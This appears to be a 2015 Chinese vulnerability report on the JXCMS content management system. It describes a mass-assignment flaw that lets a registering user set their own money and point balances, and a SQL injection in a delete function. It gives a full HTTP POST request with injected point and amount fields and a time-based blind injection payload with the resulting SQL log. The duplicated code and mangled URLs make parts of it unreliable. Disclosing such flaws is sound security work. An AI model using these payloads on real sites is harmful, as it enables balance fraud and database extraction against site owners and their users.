精讯cms sql注入 和 任意刷钱和积分漏洞

### 简要描述： 精讯cms sql注入 和 任意刷钱和积分漏洞 ### 详细说明： ``` public function reg() { if ($this -> obj -> isLogin()) { $go = $this -> referer && !strstr($this -> referer, 'login')?$this -> referer:Url :: getUrl('member'); $this -> showMsg(L('ALREADY_IS_MEMBER'), $go); } if ($this -> isSubmit) { if ($this -> obj -> reg()) { $this -> obj -> login($_POST['info']['username'], $_POST['info']['password']); $go = $this -> forward?$this -> forward:Url :: getUrl('member'); $this -> showMsg(L('REGISTER_SUCCESS'), $go); } else $this -> showMsg($this -> obj -> error); } $this -> assign('title', L('USER_REG')); $this -> display('member_reg'); } public function profile() { $this -> obj -> isLogin() or $this -> showMsg(L('LOGIN_FIRST'), Url :: getUrl('member', 'login')); if ($this -> isSubmit) { if ($this -> obj -> edit()) { $this -> showMsg(L('OPERATE_SUCCESS'), $this -> referer); } else $this -> showMsg($this -> obj -> error); } $member = $this -> obj -> find(get_cookie('userid')); $tmp = explode('-', $member['birthday']); $birthday = array('year' => intval($tmp[0]), 'month' => intval($tmp[1]), 'day' => intval($tmp[2])); $birthday['timestamp'] = $member['birthday'] != '0000-00-00' ? Func :: timeStamp($member['birthday']) : ''; $this -> assign('birthday', $birthday); $this -> assign('member', $member); $this -> assign('title', L('USER_PROFILE')); $this -> display('member_profile'); } ``` 编辑和注册都存在刷钱: ``` public function reg() { if ($this -> obj -> isLogin()) { $go = $this -> referer && !strstr($this -> referer, 'login')?$this -> referer:Url :: getUrl('member'); $this -> showMsg(L('ALREADY_IS_MEMBER'), $go); } if ($this -> isSubmit) { if ($this -> obj -> reg()) { $this -> obj -> login($_POST['info']['username'], $_POST['info']['password']); $go = $this -> forward?$this -> forward:Url :: getUrl('member'); $this -> showMsg(L('REGISTER_SUCCESS'), $go); } else $this -> showMsg($this -> obj -> error); } $this -> assign('title', L('USER_REG')); $this -> display('member_reg'); } public function profile() { $this -> obj -> isLogin() or $this -> showMsg(L('LOGIN_FIRST'), Url :: getUrl('member', 'login')); if ($this -> isSubmit) { if ($this -> obj -> edit()) { $this -> showMsg(L('OPERATE_SUCCESS'), $this -> referer); } else $this -> showMsg($this -> obj -> error); } $member = $this -> obj -> find(get_cookie('userid')); $tmp = explode('-', $member['birthday']); $birthday = array('year' => intval($tmp[0]), 'month' => intval($tmp[1]), 'day' => intval($tmp[2])); $birthday['timestamp'] = $member['birthday'] != '0000-00-00' ? Func :: timeStamp($member['birthday']) : ''; $this -> assign('birthday', $birthday); $this -> assign('member', $member); $this -> assign('title', L('USER_PROFILE')); $this -> display('member_profile'); } ``` 发送url: ``` POST /jxcmshttps://images.seebug.org/upload/index.php?c=member&a=reg HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/jxcmshttps://images.seebug.org/upload/index.php?c=member&a=reg Cookie: CNZZDATA80862620=cnzz_eid%3D973263575-1425454337-http%253A%252F%252Flocalhost%253A8081%252F%26ntime%3D1425951363; bdshare_firstime=1425454416306; CNZZDATA1670348=cnzz_eid%3D2041231052-1425547463-%26ntime%3D1425547463; CKFinder_Settings=LNNDS; 5q2M_2132_saltkey=TNJtXI64; tMAu_2132_saltkey=JmlWB55m; tMAu_2132_lastvisit=1426061040; tMAu_2132_ulastactivity=aac4qmrDgvMMbQn8lDsaj0EN7mYxTcOBDpYZ3l%2FnFqa9sATHz5Qj; 4GLW_2132_saltkey=xsrGKKEh; 4GLW_2132_lastvisit=1426062274; 4GLW_2132_ulastactivity=33febWyp0o%2FuqVB4OwJucth3pEVs9yLX0m9nGj%2FC%2B6lqI2JXPLwe; PHPSESSID=35313d6b4451b6cb3068dec613558296 X-Forwarded-For: 8.8.8.8 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 345 forward=http%3A%2F%2Flocalhost%2Fjxcms%2Fupload%2Findex.php%3Fc%3Dmember%26a%3Dlogin&info%5BJXCMS_HASH%5D=04e2d9cb5873fa&info%5Bemail%5D=test3%401673.com&info%5Busername%5D=test3&info%5Bpassword%5D=111111&info%5Bpassword%5D=111111&info%5Bgender%5D=0&captcha=tq5d&regagreement=1&submit=%D7%A2+%B2%E1&info%5Bpoint%5D=111111&info%5Bamount%5D=111111 ``` [<img src="https://images.seebug.org/upload/201503/17142703c1de64fb5a4c580766c2714b9e669f26.png" alt="xxxx.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/17142703c1de64fb5a4c580766c2714b9e669f26.png) [<img src="https://images.seebug.org/upload/201503/1714271262271bc493f64cf022c6546a3b75770a.png" alt="xxxxy.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1714271262271bc493f64cf022c6546a3b75770a.png) sql注入: ``` public function del() { $selids = R('selids'); if (!empty($selids)) { $where = strstr($selids, ',')?"id IN ($selids)":"id=$selids"; $data = $this -> where($where) -> select(); ``` 发送url: http://localhost/jxcmshttps://images.seebug.org/upload/index.php?c=member&a=reg post: selids=1111,222) or if(ascii(substr((select user()),1,1))=114,benchmark(1000000,md5(123)),1)# 抓取sql: 2015/3/17 14:14 DELETE FROM `jcollect` WHERE id IN (1111,222) or if(ascii(substr((select user()),1,1))=114,benchmark(1000000,md5(123)),1)#) 2015/3/17 14:14 SELECT * FROM `jcollect` WHERE id IN (1111,222) or if(ascii(substr((select user()),1,1))=114,benchmark(1000000,md5(123)),1)#) ### 漏洞证明：